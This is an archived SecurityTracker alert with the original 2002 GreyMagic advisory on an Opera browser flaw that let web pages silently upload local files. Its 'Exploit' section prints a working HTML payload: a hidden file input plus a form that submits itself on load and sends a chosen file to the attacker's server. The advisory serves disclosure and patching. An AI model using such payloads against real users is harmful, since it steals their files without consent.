SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Browser)  >   Opera Vendors:   Opera Software
Opera Web Browser Allows Malicious Servers to Silently Retrive Files from the Victim's System
SecurityTracker Alert ID:  1004385
SecurityTracker URL:  http://securitytracker.com/id/1004385
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 28 2002
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in the Opera web browser when run on Microsoft Windows systems. A remote user can create HTML that, when loaded, will cause the browser to silently upload files from the victim's system.

GreyMagic Security reported that a flaw in Opera allows remote users to obtain read access to any file on the target (victim) user's system.

According to the report, Opera allows a remote user (server) to set the 'value' attribute of the <input type="file"> element, which is used by the browser to upload files to HTTP servers. A remote user can assign an arbitrary string to the 'value' attribute to obtain any local file by causing the target user to submit a form. Opera apparently will issue a dialog box warning the target user that one or more files has been selected for upload. However, this dialog warning can be bypassed.

A remote user can append a newline HTML escape sequence "&#10;" to the end of the file element 'value' attribute to bypass the Opera security algorithm and cause the specified files to be uploaded silently from the target user's system.

Impact:   A remote user can create HTML that, when loaded by a target user, will cause arbitrary files on the target user's system to be uploaded by the target user's Opera browser.
Solution:   The vendor has released a fixed version (6.03), available at:

http://www.opera.com/

or

http://www.opera.com/download/get.pl?platform=win&force=6.03

Vendor URL:  www.opera.com/ (Links to External Site)
Cause:   State error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Reading ANY local file in Opera (GM#001-OP)


GreyMagic Security Advisory GM#001-OP
=====================================

By GreyMagic Software, Israel.
27 May 2002.

Available in HTML format at http://security.greymagic.com/adv/gm001-op/.

Topic: Reading ANY local file in Opera.

Discovery date: 07 May 2002.

Affected applications:
======================

* Opera 6.01 on Windows platforms.
* Opera 6.02 on Windows platforms.


Introduction:
=============

>From Opera.com:

* "Opera today ranks number three among the most widely used Internet browsers
in the world."

* "Opera is small, super-fast, secure, and can run at an optimal level without
straining system resources. We like to say that we abide by The 5 S's in all
code development: Speed, Size, Security, Standards Compliance and
State-of-the-Art."

Opera, like all browsers today, supports the <input type="file"> element, which
is a standard method for users to upload files to HTTP servers. Since the file
element is a very security-sensitive element, most web browsers do not allow
its "value" attribute to be set (read only). If it was possible to assign an
arbitrary string to the "value" attribute, an attacking server could fetch any
local file by simply submitting a form (through scripting or social
engineering, if scripting has been disabled).

Opera's approach to the file element is a little different. The "value"
attribute can be set, but before the form it resides in is submitted, a dialog
comes up with the following warning:

The files listed below have been selected, without your intervention, to be
sent to another computer. Do you want to send these files?"


Discussion:
===========

It is possible to bypass the file element's confirmation dialog, which means an
attacker can download any file from an unsuspecting Opera user.

By appending a simple "&#10;" (HTML entity, which represents the ASCII code for
a new-line character) to the end of the file element's "value" attribute,
Opera's security algorithm is fooled to think that no files were assigned.
Therefore, the warning dialog doesn't come up; Opera simply submits the form
with the desired file chosen by an attacker.

Surprisingly, versions of Opera prior to 6.01 are not vulnerable to this
attack. So a change that occurred between version 6.0 and 6.01 is the culprit.
This also means that all of the non-windows versions are safe (Opera did not
release 6.01 for other platforms yet).


Exploit:
========

This exploit will automatically transfer the file "c:/test.txt" to an attacking
host, which can handle it using a server-side environment such as ASP, PHP or
other solutions. It does not require any user interaction:

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:\test.txt&#10;"
style="visibility:hidden">
</form>
</body>


Solution:
=========

Opera was informed on 15 May 2002 and confirmed our findings. A day later, in
the evening of 16 May 2002, Opera informed us that the vulnerability was fixed
and committed to Opera's own version control system.

On 27 May 2002, Opera released version 6.03, which addressed this issue.

Opera has been extremely responsive and quick to understand and patch this
vulnerability. They have shown that they truly do take security seriously.


Tested on:
==========

Opera 6.01, NT4.
Opera 6.01, Win2000.
Opera 6.01, WinXP.
Opera 6.02, NT4.
Opera 6.02, Win2000.
Opera 6.02, WinXP.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of this issue is available at
http://security.greymagic.com/adv/gm001-op/.


Feedback:
=========

Please mail any questions or comments to security@greymagic.com.


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC